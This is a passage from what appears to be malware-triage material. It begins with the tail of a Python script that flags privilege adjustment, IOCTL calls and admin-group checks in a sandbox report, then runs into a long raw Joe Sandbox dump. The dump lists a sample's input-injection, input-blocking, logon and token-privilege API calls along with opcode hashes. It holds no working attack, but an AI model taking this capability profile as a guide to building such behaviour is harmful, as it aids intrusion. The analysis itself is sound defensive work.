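        if {"LookupPrivilegeValueW", "AdjustTokenPrivileges"} <= names:
            findings.append("privilege adjustment via AdjustTokenPrivileges at %08X" % by_name["AdjustTokenPrivileges"].ref)
        if {"CreateFileW", "DeviceIoControl"} <= names:
            call = by_name["DeviceIoControl"]
            code = hex_arg(call.args[1])
            label = (decode_ioctl(code)["name"] or "unknown IOCTL") if code is not None else "unresolved IOCTL"
            findings.append("device I/O control 0x%X (%s) at %08X" % (code or 0, label, call.ref))
        if {"AllocateAndInitializeSid", "CheckTokenMembership"} <= names:
            sid = sid_from_alloc_args(by_name["AllocateAndInitializeSid"].args)
            group = "BUILTIN\\Administrators" if sid == "S-1-5-32-544" else "unrecognised group"
            findings.append("group membership check for %s (%s, authority assumed) at %08X" % (sid, group, by_name["CheckTokenMembership"].ref))
    return findings

if __name__ == "__main__":
    for finding in triage(parse_entries(SAMPLE_REPORT)):
        print(finding)
```

The buffer sizes in the DeviceIoControl call, 0xC in and 0x28 out, equal sizeof(STORAGE_PROPERTY_QUERY) and sizeof(STORAGE_DEVICE_DESCRIPTOR), which is consistent with a device-descriptor query (the bus-type lookup a script runtime performs for drive enumeration) rather than a write to the device; the script reports only what the decoded control code supports and leaves that reading to the analyst.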
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0034F599
                                                                            • FindClose.KERNEL32(00000000), ref: 0034F5C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: 8eb44cc5e2f708f1492947ad6a9c5fb829ed223252000c0c5c424bf63b0a1d7c
                                                                            • Instruction ID: 058376334a8e1587beb545e2fce761b37f63517b7372314ad52e96dc12bac5e0
                                                                            • Opcode Fuzzy Hash: 8eb44cc5e2f708f1492947ad6a9c5fb829ed223252000c0c5c424bf63b0a1d7c
                                                                            • Instruction Fuzzy Hash: 3111C4316002009FD701EF28D849A6EB3E9FF89324F04895EF9A5DB291DB30BD048B85
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0035BE6A,?,?,00000000,?), ref: 0034CEA7
                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0035BE6A,?,?,00000000,?), ref: 0034CEB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: 7606c10541110bcc24e1247614ea1adad0d18af33998d6d04c9b4eb4aaf86cb1
                                                                            • Instruction ID: 1b106a8eac42a9606d9e5f0fa8a351d4d2cbbb51a80dd87ef22e843c85f7f39b
                                                                            • Opcode Fuzzy Hash: 7606c10541110bcc24e1247614ea1adad0d18af33998d6d04c9b4eb4aaf86cb1
                                                                            • Instruction Fuzzy Hash: F0F08235111329ABDB11DBA4DC49FEA776DBF08361F004165F915DA181D770AA40CBA0
                                                                            APIs
                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00344153
                                                                            • keybd_event.USER32(?,76AAC0D0,?,00000000), ref: 00344166
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: InputSendkeybd_event
                                                                            • String ID:
                                                                            • API String ID: 3536248340-0
                                                                            • Opcode ID: 355f0e785bd18c4536127bdd16577bb0460ee2e7838b21a59f574bbdc6217f44
                                                                            • Instruction ID: b3ace120cab926bec5f670c0251d56a5d69df1a4f0dcd0574478a046db3d9fcd
                                                                            • Opcode Fuzzy Hash: 355f0e785bd18c4536127bdd16577bb0460ee2e7838b21a59f574bbdc6217f44
                                                                            • Instruction Fuzzy Hash: 86F0907080034DAFDB068FA0C805BBE7FB4EF00305F00805AF9659A191D779D612DFA0
                                                                            APIs
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0033ACC0), ref: 0033AB99
                                                                            • CloseHandle.KERNEL32(?,?,0033ACC0), ref: 0033ABAB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                            • String ID:
                                                                            • API String ID: 81990902-0
                                                                            • Opcode ID: 4c1f7b41ee3b0c1542bd81f0f468fc37fa8cfc86931b1562638fb81dfe242e42
                                                                            • Instruction ID: 7a183b22991dbabcffd05e0ea190dde0d6e4410c9f15e4aaa9e3d629be1be155
                                                                            • Opcode Fuzzy Hash: 4c1f7b41ee3b0c1542bd81f0f468fc37fa8cfc86931b1562638fb81dfe242e42
                                                                            • Instruction Fuzzy Hash: A8E0BF75000610AFE7262F54EC05DB6BBAEEB04320B108469B49985470D7625C90AB50
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00326DB3,-0000031A,?,?,00000001), ref: 003281B1
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003281BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 3639a616b50e6d40fbdbc037220a5508a7a759b8214e3e50afa2bc70701cdea3
                                                                            • Instruction ID: b74db7a550b1eb68768256107e0e0d8f7b0bdb0d2d2c2a45c0c70a83bc3c7dc7
                                                                            • Opcode Fuzzy Hash: 3639a616b50e6d40fbdbc037220a5508a7a759b8214e3e50afa2bc70701cdea3
                                                                            • Instruction Fuzzy Hash: 7DB09235044708ABDB022BA1EC09B587F6CEB08752F0040A0F60D440A18BB254108B92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: <
                                                                            • API String ID: 3964851224-1591397561
                                                                            • Opcode ID: 9e2aef23c507b4dcf566ed210d12d401aff625bd742a7d81e9db97ecba7a2fdc
                                                                            • Instruction ID: 60a5b339f4e1da93506ccce3d301f78e99ed710880dfc30f1755f6844869656b
                                                                            • Opcode Fuzzy Hash: 9e2aef23c507b4dcf566ed210d12d401aff625bd742a7d81e9db97ecba7a2fdc
                                                                            • Instruction Fuzzy Hash: 8F929E70608341CFD72ADF18C480BAAB7E5BF88304F15895DE98A8B392D775ED85CB52
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 206efba3301a378a89d64af8ae7a455fc46fd2abb6a4c393df1b3eda61c02f94
                                                                            • Instruction ID: 83d46967af96147bbcbefe42984717482f85d435a276dde315d70ba25eb20201
                                                                            • Opcode Fuzzy Hash: 206efba3301a378a89d64af8ae7a455fc46fd2abb6a4c393df1b3eda61c02f94
                                                                            • Instruction Fuzzy Hash: 6C32E232D29F514DD7239634D862336A29CAFB73D4F15D727F81AB5AAAEB29C4C34100
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 674341424-0
                                                                            • Opcode ID: b3076afdcfe28b7686ac664d6b8578d7ed358b02892a55355d3909080e5fb829
                                                                            • Instruction ID: 5ece66e204bd885b4ca7e1b1aabc6a660b48aeb6915e290b9418adb06352e6d2
                                                                            • Opcode Fuzzy Hash: b3076afdcfe28b7686ac664d6b8578d7ed358b02892a55355d3909080e5fb829
                                                                            • Instruction Fuzzy Hash: 9D22C4716193009FD726DF14C8A1B6FB7E4BF88310F11891EF49A9B292DB75E944CB82
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 16d3a8f2e99e31cf3368ff7c54e26541779844d800f6eafb878374e7bc2b7473
                                                                            • Instruction ID: 918ff3f3ac37a7a17910cecc74f5a22fc6db96ca58b4173e734f87ba45419757
                                                                            • Opcode Fuzzy Hash: 16d3a8f2e99e31cf3368ff7c54e26541779844d800f6eafb878374e7bc2b7473
                                                                            • Instruction Fuzzy Hash: 73B1D120D2AF414DD62396398871336B65CAFBB3D5F91D71BFC1A74E62EB2285D34280
                                                                            APIs
                                                                            • __time64.LIBCMT ref: 0034B6DF
                                                                              • Part of subcall function 0032344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0034BDC3,00000000,?,?,?,?,0034BF70,00000000,?), ref: 00323453
                                                                              • Part of subcall function 0032344A: __aulldiv.LIBCMT ref: 00323473
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                            • String ID:
                                                                            • API String ID: 2893107130-0
                                                                            • Opcode ID: b17bb5a779cf4569b8b92cd3d877839215d28e46919ee79e4df9f9b9c6ec24ce
                                                                            • Instruction ID: 3a1ded1639c2f0992b41d49ab26e821f23c8ddc0ee48d1799feeb9e5ebd2c2a6
                                                                            • Opcode Fuzzy Hash: b17bb5a779cf4569b8b92cd3d877839215d28e46919ee79e4df9f9b9c6ec24ce
                                                                            • Instruction Fuzzy Hash: 71217F766345108BC72ACF38C881A92F7E5EB95310B258E6DE4E5CF2C0CB78BA05DB54
                                                                            APIs
                                                                            • BlockInput.USER32(00000001), ref: 00356ACA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            • Opcode ID: 8ae1b221ddb2c7c40c2ef9e03d6265fb6a5decf617a9825ffd8b40a55fdfc405
                                                                            • Instruction ID: 2b803593dd66187d642da1b66153b67b621fd8b7f3aa4320855888666533baac
                                                                            • Opcode Fuzzy Hash: 8ae1b221ddb2c7c40c2ef9e03d6265fb6a5decf617a9825ffd8b40a55fdfc405
                                                                            • Instruction Fuzzy Hash: 6DE0D8352002046FD701EF9DD405D96B7ECAF78351F04C416F905D72A0DAB0F8048B90
                                                                            APIs
                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003474DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: mouse_event
                                                                            • String ID:
                                                                            • API String ID: 2434400541-0
                                                                            • Opcode ID: ec8deb98d35c59ecd82a41155564317087b4d68ccb9811045a94186e797ab8ca
                                                                            • Instruction ID: d828603878cbd42dbf65005045a21d5e9e08b879b4b6757f3e94d01e05b15a1b
                                                                            • Opcode Fuzzy Hash: ec8deb98d35c59ecd82a41155564317087b4d68ccb9811045a94186e797ab8ca
                                                                            • Instruction Fuzzy Hash: 50D05EA012C30538EC6B07269C0FF760A8CF3007C0F838189B082CEAC1BB8078059132
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0033AD3E), ref: 0033B124
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LogonUser
                                                                            • String ID:
                                                                            • API String ID: 1244722697-0
                                                                            • Opcode ID: 9b53f87834f7e61d0672d17dacf539117005397d8bdef751dd3b4b1d6796c9a5
                                                                            • Instruction ID: 51544a3094645a1034f572b961f8ec30bb7c967d790b77782fbe279d03b03c9a
                                                                            • Opcode Fuzzy Hash: 9b53f87834f7e61d0672d17dacf539117005397d8bdef751dd3b4b1d6796c9a5
                                                                            • Instruction Fuzzy Hash: 36D09E321A464EAEDF025FA4EC06EAE3F6AEB04701F548511FA15D50A1C675D531AB50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 07fba471cee475cbe6864063e331c13c869c34bc0ec17d114985a714fca0cca9
• Instruction ID: d3509c6633db776f2c7d1c991d8ad6220d1cb51cdf49ac6cede2703dd0e224e6
• Opcode Fuzzy Hash: 07fba471cee475cbe6864063e331c13c869c34bc0ec17d114985a714fca0cca9
• Instruction Fuzzy Hash: F5C04CF140050ADFCB52DBC0C9449EEB7BCAB04701F1040919105F1150D7749B459B77
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0032818F
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: ad3d544e55a766d7064140cca40dc535b96c90fe30f0eff33be61b7bb8db2469
• Instruction ID: 61012a81883af81127c82fed56396f77ad44795018806f5731d1bf8d46e9a059
• Opcode Fuzzy Hash: ad3d544e55a766d7064140cca40dc535b96c90fe30f0eff33be61b7bb8db2469
• Instruction Fuzzy Hash: 32A0113000020CAB8F022B82EC088883F2CEA002A0B0000A0F80C000208BA2A8208A82
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 37bfe1eb71125ae964f68e96cb112763199c9bcc308ab526b23f83c22e98e615
• Instruction ID: 543af42536f41aed332135026b271ee7986fb4b6c0f817f7b940085e8e86f20f
• Opcode Fuzzy Hash: 37bfe1eb71125ae964f68e96cb112763199c9bcc308ab526b23f83c22e98e615
• Instruction Fuzzy Hash: 9522C170A05209CFDB26DF54C4A0ABAB7F1FF18304F15C869D949AB391E735AD81CB91
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 269e4e3adfd050a029832bc599fc0c8d0223d041057959aa168d78806958e2c8
• Instruction ID: d3f987c3c9f91a86281913b96a5dfb7bb603c8052766ca72258a5593af520411
• Opcode Fuzzy Hash: 269e4e3adfd050a029832bc599fc0c8d0223d041057959aa168d78806958e2c8
• Instruction Fuzzy Hash: C412A070A01609DFDF16DFA5D991AEEB7F9FF48300F108529E806E7295EB36A910CB50
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 3728558374-0
• Opcode ID: 22d9b7ace5b5d76a7d88dc3294f23bb8914eba0bba7ebd31d4bb9b766cfbe743
• Instruction ID: 0db6aa7b7c562298ac1f4b6e619580afca58b2a416cae43f3983eb77f58aa008
• Opcode Fuzzy Hash: 22d9b7ace5b5d76a7d88dc3294f23bb8914eba0bba7ebd31d4bb9b766cfbe743
• Instruction Fuzzy Hash: AA02B270A01205DFCF1ADF64D991AAFB7B9EF48300F11C469E80ADB295EB35D950CB91
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction ID: e63bf4afac37178a079305a7be8ec5590aeea26e7552cfc83653e288c7e6f6cd
• Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction Fuzzy Hash: 4AC1A5362051A30EDF2F463A947447EFAA15AA27B171B076DD4B3CB4D6FF20C568D620
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
